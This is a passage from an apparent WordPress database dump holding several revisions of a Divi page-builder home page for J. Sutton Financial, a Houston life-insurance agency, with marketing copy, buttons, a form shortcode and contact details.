custom_margin=\"|37px||89px|false|false\" custom_margin_tablet=\"|37px||89px|false|false\" custom_margin_phone=\"|0px||0px|false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" animation_direction=\"left\" animation_duration=\"1250ms\" hover_enabled=\"0\" global_colors_info=\"{}\" custom_padding_last_edited=\"on|phone\" custom_padding_phone=\"0px|0px|||false|false\" sticky_enabled=\"0\" align=\"center\" width_last_edited=\"on|phone\" custom_padding_tablet=\"33px|1px||||\" width_tablet=\"70%\" width_phone=\"70%\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" custom_margin=\"||10px|||\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-15px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\"]<h2><strong>Want To Know How Much Insurance You Need?</strong></h2>[/et_pb_text][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][gravityform id=\"1\" title=\"false\" description=\"false\" ajax=\"true\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" custom_margin=\"66px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\">Join Our Team!</h2>\n<p>J. Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||0px||\" custom_padding=\"|||0px||\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" parallax=\"on\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"67px||141px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect typing_effect=\"Proudly headquartered in Houston, Texas!\" typing_cursor_color=\"#FFFFFF\" typing_background_color=\"RGBA(255,255,255,0)\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" typing_text_color=\"#FFFFFF\" custom_margin=\"54px|||||\" global_colors_info=\"{}\"][/dsm_typing_effect][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" height=\"148px\" custom_margin=\"-20px|auto||auto|false|false\" custom_padding=\"66px||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" title_text=\"j sutton logo white no background\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"46.1%\" custom_margin=\"|188px||188px||true\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on|||#f9f9f9|dotted\" link_text_color=\"#f9f9f9\" background_layout=\"dark\" custom_margin=\"12px|||||\" custom_padding=\"0px|0px|0px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\">340 North Sam Houston Parkway East<br />Houston, TX 77060<br /><a href=\"mailto:info@JSuttonFinancial.com\">info@JSuttonFinancial.com</a><br /><a href=\"tel:713-254-3439\">(713) 254-3439</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"24.8px\" custom_margin=\"||66px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\"><span style=\"color: #ffffff;\">©2023 J. Sutton Financial | All Rights Reserved | Privacy Policy</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-08 21:16:58','2023-04-08 21:16:58','',138,'http://cmdev-site1.com/?p=862',0,'revision','',0),(863,1,'2023-04-08 21:17:29','2023-04-08 21:17:29','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Header-Full-Color-2200x1028-2.png\" parallax=\"on\" min_height=\"700px\" custom_margin=\"||-45px|||\" custom_padding=\"23px||30px|||\" hover_transition_speed_curve=\"ease-out\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|auto||27px||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu submenu_direction=\"downwards\" active_link_color=\"#FFFFFF\" dropdown_menu_bg_color=\"#FFFFFF\" dropdown_menu_line_color=\"#003372\" dropdown_menu_text_color=\"#000000\" mobile_menu_bg_color=\"#FFFFFF\" mobile_menu_text_color=\"#000000\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" logo_width=\"20%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|phone\" mobile_menu_bg_color_tablet=\"#FFFFFF\" mobile_menu_bg_color_phone=\"#FFFFFF\" mobile_menu_bg_color_last_edited=\"on|phone\" logo_width_tablet=\"20%\" logo_width_phone=\"75%\" logo_width_last_edited=\"on|phone\" module_class=\"menu\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_font=\"||||||||\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" background_layout=\"dark\" module_alignment=\"left\" min_height=\"221.9px\" custom_margin=\"-43px|||0px|false|false\" custom_margin_tablet=\"-43px|||0px|false|false\" custom_margin_phone=\"-10px||||false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||0px|false|false\" global_colors_info=\"{}\" active_link_color__hover_enabled=\"on|hover\" active_link_color__hover=\"#003372\" menu_text_color__hover_enabled=\"on|hover\" menu_text_color__hover=\"#003372\" dropdown_menu_bg_color__hover_enabled=\"on|desktop\" mobile_menu_text_color__hover_enabled=\"on|desktop\" dropdown_menu_bg_color__hover=\"#FFFFFF\" mobile_menu_text_color__hover=\"#000000\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" min_height=\"100px\" custom_margin=\"||-12px|||\" custom_padding=\"||0px||false|false\" global_colors_info=\"{}\"]<h1><span style=\"color: #ffffff;\">Planning for a <em>better</em> financial future </span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin_tablet=\"\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|desktop\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_button button_url=\"/products-services/\" button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button=\"on\" button_text_color=\"#000000\" button_bg_color=\"#ffffff\" button_border_width=\"0px\" button_border_radius=\"14px\" custom_margin=\"|||150px|false|false\" custom_margin_tablet=\"|||150px|false|false\" custom_margin_phone=\"|||0px|false|false\" custom_margin_last_edited=\"on|phone\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_button button_url=\"/careers/\" button_text=\"Work for Us\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button=\"on\" button_text_color=\"#000000\" button_bg_color=\"#ffffff\" button_border_width=\"0px\" button_border_radius=\"14px\" custom_margin=\"|150px|||false|false\" custom_margin_tablet=\"|150px|||false|false\" custom_margin_phone=\"|0px|||false|false\" custom_margin_last_edited=\"on|desktop\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Thumbs-Up-Icon-No-Background-Hex-666666.png\" title_text=\"Thumbs Up Icon No Background Hex 666666\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|37px||89px|false|false\" custom_margin_tablet=\"|37px||89px|false|false\" custom_margin_phone=\"|0px||0px|false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" animation_direction=\"left\" animation_duration=\"1250ms\" hover_enabled=\"0\" global_colors_info=\"{}\" custom_padding_last_edited=\"on|phone\" custom_padding_phone=\"0px|0px|||false|false\" sticky_enabled=\"0\" align=\"center\" width_last_edited=\"on|phone\" custom_padding_tablet=\"33px|1px||||\" width_tablet=\"70%\" width_phone=\"70%\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"]<h2><strong>Providing Premium Life Insurance Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" custom_margin=\"||10px|||\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-15px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\"]<h2><strong>Want To Know How Much Insurance You Need?</strong></h2>[/et_pb_text][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][gravityform id=\"1\" title=\"false\" description=\"false\" ajax=\"true\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" custom_margin=\"66px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\">Join Our Team!</h2>\n<p>J. Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||0px||\" custom_padding=\"|||0px||\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" parallax=\"on\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"67px||141px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect typing_effect=\"Proudly headquartered in Houston, Texas!\" typing_cursor_color=\"#FFFFFF\" typing_background_color=\"RGBA(255,255,255,0)\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" typing_text_color=\"#FFFFFF\" custom_margin=\"54px|||||\" global_colors_info=\"{}\"][/dsm_typing_effect][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" height=\"148px\" custom_margin=\"-20px|auto||auto|false|false\" custom_padding=\"66px||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" title_text=\"j sutton logo white no background\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"46.1%\" custom_margin=\"|188px||188px||true\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on|||#f9f9f9|dotted\" link_text_color=\"#f9f9f9\" background_layout=\"dark\" custom_margin=\"12px|||||\" custom_padding=\"0px|0px|0px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\">340 North Sam Houston Parkway East<br />Houston, TX 77060<br /><a href=\"mailto:info@JSuttonFinancial.com\">info@JSuttonFinancial.com</a><br /><a href=\"tel:713-254-3439\">(713) 254-3439</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"24.8px\" custom_margin=\"||66px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\"><span style=\"color: #ffffff;\">©2023 J. Sutton Financial | All Rights Reserved | Privacy Policy</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-08 21:17:29','2023-04-08 21:17:29','',138,'http://cmdev-site1.com/?p=863',0,'revision','',0),(866,1,'2023-04-08 21:19:32','2023-04-08 21:19:32','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Header-Full-Color-2200x1028-2.png\" parallax=\"on\" min_height=\"700px\" custom_margin=\"||-45px|||\" custom_padding=\"23px||30px|||\" hover_transition_speed_curve=\"ease-out\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|auto||27px||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu submenu_direction=\"downwards\" active_link_color=\"#FFFFFF\" dropdown_menu_bg_color=\"#FFFFFF\" dropdown_menu_line_color=\"#003372\" dropdown_menu_text_color=\"#000000\" mobile_menu_bg_color=\"#FFFFFF\" mobile_menu_text_color=\"#000000\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" logo_width=\"20%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|phone\" mobile_menu_bg_color_tablet=\"#FFFFFF\" mobile_menu_bg_color_phone=\"#FFFFFF\" mobile_menu_bg_color_last_edited=\"on|phone\" logo_width_tablet=\"20%\" logo_width_phone=\"75%\" logo_width_last_edited=\"on|phone\" module_class=\"menu\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_font=\"||||||||\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" background_layout=\"dark\" module_alignment=\"left\" min_height=\"221.9px\" custom_margin=\"-43px|||0px|false|false\" custom_margin_tablet=\"-43px|||0px|false|false\" custom_margin_phone=\"-10px||||false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||0px|false|false\" global_colors_info=\"{}\" active_link_color__hover_enabled=\"on|hover\" active_link_color__hover=\"#003372\" menu_text_color__hover_enabled=\"on|hover\" menu_text_color__hover=\"#003372\" dropdown_menu_bg_color__hover_enabled=\"on|desktop\" mobile_menu_text_color__hover_enabled=\"on|desktop\" dropdown_menu_bg_color__hover=\"#FFFFFF\" mobile_menu_text_color__hover=\"#000000\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" min_height=\"100px\" custom_margin=\"||-12px|||\" custom_padding=\"||0px||false|false\" global_colors_info=\"{}\"]<h1><span style=\"color: #ffffff;\">Planning for a <em>better</em> financial future </span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin_tablet=\"\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|desktop\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_button button_url=\"/products-services/\" button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button=\"on\" button_text_color=\"#000000\" button_bg_color=\"#ffffff\" button_border_width=\"0px\" button_border_radius=\"14px\" custom_margin=\"|||150px|false|false\" custom_margin_tablet=\"|||150px|false|false\" custom_margin_phone=\"|||0px|false|false\" custom_margin_last_edited=\"on|phone\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_button button_url=\"/careers/\" button_text=\"Work for Us\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button=\"on\" button_text_color=\"#000000\" button_bg_color=\"#ffffff\" button_border_width=\"0px\" button_border_radius=\"14px\" custom_margin=\"|150px|||false|false\" custom_margin_tablet=\"|150px|||false|false\" custom_margin_phone=\"|0px|||false|false\" custom_margin_last_edited=\"on|desktop\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Thumbs-Up-Icon-No-Background-Hex-666666.png\" title_text=\"Thumbs Up Icon No Background Hex 666666\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"||||false|false\" custom_margin_tablet=\"|37px||89px|false|false\" custom_margin_phone=\"|0px||0px|false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" animation_direction=\"left\" animation_duration=\"1250ms\" hover_enabled=\"0\" global_colors_info=\"{}\" custom_padding_last_edited=\"on|phone\" custom_padding_phone=\"0px|0px|||false|false\" sticky_enabled=\"0\" width_last_edited=\"on|desktop\" module_alignment=\"right\" align=\"right\" custom_padding_tablet=\"33px|1px||||\" width_tablet=\"70%\" width_phone=\"70%\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"]<h2><strong>Providing Premium Life Insurance Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" custom_margin=\"||10px|||\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-15px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" 